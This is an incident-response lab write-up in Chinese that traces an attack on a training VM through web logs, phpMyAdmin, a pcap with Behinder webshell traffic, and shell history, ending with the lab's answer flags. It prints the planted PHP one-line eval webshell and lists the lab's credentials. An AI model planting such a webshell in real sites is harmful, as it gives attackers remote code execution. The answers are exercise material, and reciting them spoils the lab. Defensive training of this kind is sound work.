Hvv--知攻善防应急响应靶机--Linux2

HW–应急响应靶机–Linux2

所有靶机均来自 知攻善防实验室

靶机整理:

  • 夸克网盘:https://pan.quark.cn/s/4b6dffd0c51a#/list/share
  • 百度云盘:https://pan.baidu.com/s/1NnrS5asrS1Pw6LUbexewuA?pwd=txmy

官方WP:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ

蓝队应急响应工具箱:

  • 夸克网盘:https://pan.quark.cn/s/6d7856efd1d1#/list/share

  • 百度云盘:https://pan.baidu.com/s/1ZyrDPH6Ji88w9IJMoFpANA?pwd=ilzn

前景需要:看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3

解题关键点

网站日志

PHPMyadmin | md5加密

注册页面被挂🐎

WireShark

冰蝎Webshell流量特征

history命令

环境变量

虚拟机登录

密码中的I为大写的ℹ️

image-20240608175634390

查看虚拟机IP,我这里是10.10.10.53,NAT模式自动分配的

image-20240608175749734

由于靶机是最小化模式的,不好操作,也不好复制粘贴,我们利用MobaXterm工具ssh连接靶机进行操作,也可以利用其他ssh连接工具,如Xshell等等

image-20240608175959725

输入密码后发现成功登录靶机

image-20240608180109656

发现当前路径下有一个数据包,还有题解系统

image-20240608180354250

尝试运行题解系统,看需要获取哪些信息

image-20240608180336161

攻击者IP

这个靶机是利用宝塔来管理的,修改宝塔面板密码为root

image-20240608180219245

查看宝塔面板默认信息

image-20240608180709892

登录宝塔面板

image-20240608180839937

输入用户名密码

用户名:uysycv5w

密码:root

image-20240608180959473

成功登录宝塔面板

image-20240608181018225

在网站日志中可看到全部是 192.168.20.1 的IP地址image-20240608181309652

网站 选项卡中点击 127.0.0.1进 行站点修改,也可看到IP

image-20240608181632874

攻击者修改的管理员密码(明文)

数据库账号密码在那一行,密码点那个眼睛👀就可以显示,可以通过面板或者公共方式访问 phpMyAdmin ,都差不多

image-20240608181929477

这里我们选择面板访问,输入账号密码

用户名:kaoshi

密码:5Sx8mK5ieyLPb84m

image-20240608182238917

成功登录 phpMyAdmin ,发现 kaoshi 数据库

image-20240608182304882

在第二页的 x2_user 表中发现账号密码,密码被加密了,需要查看源码看是什么加密算法来进行逆推

不过这里一眼就可以看出是md5加密,看源码只是为了防止密码被加盐

image-20240608182429555

文件 选项卡下,发现了 register.app.php 是注册页面,双击文件即可打开在线编辑器查看文件,发现第65行,存储密码时调用了 modifyUserPassword 函数来加密

#register.app.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/controller/register.app.php

image-20240608183017784

之后在 user.cls.php 页面中发现 modifyUserPassword 函数代码块,发现利用的是md5加密算法

#user.cls.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/cls/user.cls.php

image-20240608183532263

直接将peadmin用户的密码密文放到在线解密网站去解密

在线md5解密网站:https://www.somd5.com/

密文:f6f6eb5ace977d7e114377cc7098b7e3

image-20240608183850994

得出明文密码为 Network@2020

第一次Webshell的连接URL

网站 选项卡下,双击 127.0.0.1 或者点击最右边的设置,在 域名管理 中添加一个域名,我添加的是靶机机器IP 10.10.10.53 ,之后就可以访问靶机Web页面

image-20240608184234975

访问靶机Web页面,发现是PHPEMS模拟考试系统

image-20240608184622513

拿刚刚获取的账号密码登录网站

账号:peadmin

密码:Network@2020

image-20240608184750236

然后点击 个人中心 页面的 后台管理

image-20240608184921773

成功进入网站后台管理页面

image-20240608185015035

内容页面的 标签管理选择卡中发现木马文件

image-20240608185155890

image-20240608185139128

发现木马写在了 注册协议 注册页面 ,注册协议的路由为 user-app-register

image-20240608185442672

image-20240608185412038

那提交第一次Webshell的连接URL则为

http://10.10.10.53/index.php?user-app-register

Webshell连接密码

内容选项卡页面的标签管理中发现木马文件

image-20240608185644523

#木马文件源码
<?php 
namespace t;
@eval($_POST['Network2020']);
?>

则Webshell的连接密码为 Network2020

数据包的flag1

下载 /root 目录下的 数据包1.pcapng 如果用的是 MobaXterm 软件可以直接拖拽至桌面即可完成下载,其他ssh连接软件自行网上查找下载办法,或者利用其他办法,如SCP、FTP、临时HTTP服务下载等等,这里不多赘述,请自行百度

image-20240608190030662

将数据包用 WireShark 打开,之后输入 tcp.stream eq 20 过滤出一段数据流,选择 /flag1 那一行右键,在弹出的菜单栏中选择 追踪流TCP流 ,即可弹出页面,在页面中发现 flag1

image-20240608191257392
flag1{Network@_2020_Hack}

攻击者使用的后续上传的木马文件名称

输入 tcp.stream eq 30 过滤出一段数据流,选择 /version2.php 那一行右键,在弹出的菜单栏中选择 追踪流TCP流 ,即可弹出页面,在页面中发现经典的 冰蝎Webshell特征

冰蝎Webshell流量特征参考文章:冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户

image-20240608191946017
#木马名称
version2.php

攻击者隐藏的flag2

查看 history 命令出来的命令历史记录,发现攻击者疑似依次修改过mpnotify.phpalinotify.php 两个文件

image-20240608192646304

依据历史命令得知这两个文件是在.api/目录下的,查看两个文件存放位置

image-20240608192812166

mpnotify.php 文件没有发现异常

image-20240608193116643

alinotify.php 文件中发现flag2

image-20240608193202158

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

攻击者隐藏的flag3

history命令查看命令记录发现攻击者创建了一个用户flag3,定义了一个全局变量$flag3,疑似修改了环境变量文件/etc/profile,env命令(显示系统的环境变量)也有嫌疑

image-20240608193353819

查看文件、变量、env命令都可查看到flag3

image-20240608193932947

flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功通关

#wp通关Payload192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

成功通关

#wp通关Payload192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

image-20240608195252246

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/29149.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

React@16.x(31)useLayoutEffect

目录 1&#xff0c;介绍2&#xff0c;注意点 1&#xff0c;介绍 在用法上和 useEffect 没有任何区别&#xff0c;只是执行的时间点不同。 useEffect 会在组件渲染结束后&#xff0c;UI展示在页面上之后再执行。所以不会阻塞渲染。useLayoutEffect 会在组件渲染结束后&#xf…

课设--学生成绩管理系统(核心代码部分)

欢迎来到 Papicatch的博客 系统介绍 课设--学生成绩管理系统&#xff08;一&#xff09;-CSDN博客 课设--学生成绩管理系统&#xff08;二&#xff09;-CSDN博客 课设--学生成绩管理系统&#xff08;三&#xff09;-CSDN博客 目录 &#x1f349;内部接口 &#x1f348; 登…

awtk界面实现下拉屏功能

单页面下拉屏 1.src/common/下创建slidescreen.h slidescreen.c slidescreen.h #ifndef SLIDESCREEN_H #define SLIDESCREEN_H#include "awtk.h" #include "../common/navigator.h"BEGIN_C_DECLS#define false 0 #define true 1//滑屏动作值 #define SL…

Navicat 安装及初步配置指南

Navicat 是一款广泛使用的数据库管理工具&#xff0c;支持多种数据库&#xff0c;如 MySQL、PostgreSQL、SQLite 等。以下是 Navicat 安装步骤的详细说明&#xff1a; 在 Windows 上安装 Navicat 下载 Navicat 安装包&#xff1a; 访问 Navicat 官方网站&#xff1a;Navicat 官…

第2讲:pixi.js 绘制HelloWorld

基于第0讲和第1讲&#xff0c;我们增添了vite.config.ts文件。并配置了其他的http端口。 此时&#xff0c;我们删除掉没用的东西。 删除 conter.ts、typescript.svg 在main.ts中改成如下内容&#xff1a; import {Application, Text} from pixi.js import ./style.css// 指明…

C语言笔记25 •顺序表介绍•

数据结构是计算机存储、组织数据的⽅式。数据结构是指相互之间存在⼀种或多种特定关系 的数据元素的集合。数据结构反映数据的内部构成&#xff0c;即数据由那部分构成&#xff0c;以什么⽅式构成&#xff0c;以及数据元素之间呈现的结构。也就是能够存储数据&#xff1b; 存储…

中介子方程二十二

X$XFX$XdXuXWXπX$XWXeXyXeXyXeXWX$XπXWXuXdX$XFX$XEXyXαXiX$XαXiXrXkXtXyX$XpXVX$XdXuXWXπX$XWXeXyXeXyXeXWX$XπXWXuXdX$XVXpX$XyXtXkXrXiXαX$XiXαXyXEX$XFX$XEXyXαXiX$XαXiXrXkXtXyX$XpXVX$XdXuXWXπX$XWXeXyXeXyXeXWX$XπXWXuXdX$XVXpX$XyXtXkXrXiXαX$XiXαXyXEX$…

导航台运营状态明细

Select a.部门, a.最近登陆时间, b.prev_exec_start 访问时间, b.username 访问用户, b.姓名 From zlClients A, (Select a.Prev_Exec_Start, a.Username, Terminal, c.姓名 From sys.gv_$session A, 上机人员表 B, 人员…

Nginx06-rewrite模块详解与实验

目录 写在前面Nginx06nginx rewriterewrite 模块return案例01 访问/admin/ 返回403案例02 域名间跳转 if案例03 只允许GET、POST请求&#xff0c;其他禁止访问 set案例04 设置是否处于维护状态&#xff0c;是则返回503&#xff0c;否则正常访问 rewrite案例05 域名跳转案例06 r…

Unity | Shader基础知识(第十四集:简单效果练习)

目录 前言 一、效果预览 1.弧形边缘光 二、效果制作 1. 制作弧形边缘光 2.弧形边缘光进阶 3.弧形边缘光调节渐变范围 4.边缘光突变 5.同心圆 三、加入世界坐标做效果 1.绘制结界 2.斑马球 3.效果合并 四、作者的碎碎念 前言 有粉丝建议说&#xff0c;让我继续更新…

JMU 数科 数据库与数据仓库期末总结(4)实验设计题

E-R图 实体-关系图 E-R图的组成要素主要包括&#xff1a; 实体&#xff08;Entity&#xff09;&#xff1a;实体代表现实世界中可相互区别的对象或事物&#xff0c;如顾客、订单、产品等。在图中&#xff0c;实体通常用矩形表示&#xff0c;并在矩形内标注实体的名称。 属性…

基于c语言的简单的数据库

​‌​⁠​​​​​⁠​‬​‬‌​‍​​​‌​‌‬​‌​⁠​​&#xfeff;‬‍‬​​⁠​‬‍&#xfeff;​​‬​​​‬简单的数据库 - 飞书云文档 (feishu.cn) mydatabase: 实现一个简单的数据库&#xff0c;基于B树 (gitee.com)

纯css星空动画

让大家实现一个这样的星空动画效果,大家会怎么做? js,不! 其实使用css就能写 我也不藏着掖着,源码直接放下面了 <script setup></script><template><div class"box"><div v-for"i in 5" :key"i" :class"layer…

基于C#、Visual Studio 2017以及.NET Framework 4.5的Log4Net使用教程

在使用Log4Net记录日志时&#xff0c;以下是一个基于C#、Visual Studio 2017以及.NET Framework 4.5的详细步骤教程。这个教程适合初学者&#xff0c;会从添加Log4Net库、配置日志、编写日志记录代码等方面进行说明。 步骤1&#xff1a;安装Log4Net 通过NuGet安装 打开您的Vi…

信友队:南风的收集

C. [202406C]楠枫的收集 文件操作 时间限制: 1000ms 空间限制: 262144KB 输入文件名: 202406C.in 输出文件名: 202406C.out Accepted 100 分 题目描述 一年四季&#xff0c;寒暑交替&#xff0c;楠枫总是会收集每一个季节的树叶&#xff0c;并把它们制作成标本收集起来。当…

力扣 24.两两交换链表的结点

class Solution { public: ListNode* swapPairs(ListNode* head) { if(headnullptr ||head->nextnullptr) return head; auto tmpswapPairs(head->next->next); auto rethead->next; head->next->nexthead; head->nexttmp; return ret; } };

解放代码:识别与消除循环依赖的实战指南

目录 一、对循环依赖的基本认识 &#xff08;一&#xff09;代码中形成循环依赖的说明 &#xff08;二&#xff09;无环依赖的原则 二、识别和消除循环依赖的方法 &#xff08;一&#xff09;使用JDepend识别循环依赖 使用 Maven 集成 JDepend 分析报告识别循环依赖 &a…

用Python pillow 创建和保存GIF动画

使用pillow库来创建和保存gif GIFs:图形交换格式(gif)是一种位图图像格式&#xff0c;由美国计算机科学家Steve Wilhite于1987年6月15日领导的在线服务提供商CompuServe的一个团队开发。 一个GIF文件通常存储一个图像&#xff0c;但该格式允许在一个文件中存储多个图像。该格…

为什么要学习这么多“没用”的知识

最近也在看一些东西&#xff0c;很多很杂&#xff0c;底层的知识&#xff0c;高级的架构&#xff0c;正确且废话的方法论。。。越看越迷茫。和同学聊天&#xff0c;也在自嘲现在看的这些八股文&#xff0c;源代码&#xff0c;除了面试那几天用一下&#xff0c;可能一辈子都不会…

【Java05】Java中的多维数组

从数组底层运行机制上看&#xff0c;Java没有多维数组一说。所谓多维数组&#xff0c;是说一个引用变量指向的元素也是引用变量。 例如&#xff0c;type[] arrayName是个指向type类型元素的数组。倘若type也是数组引用变量&#xff0c;比如int[]&#xff0c;那么这个数组就可以…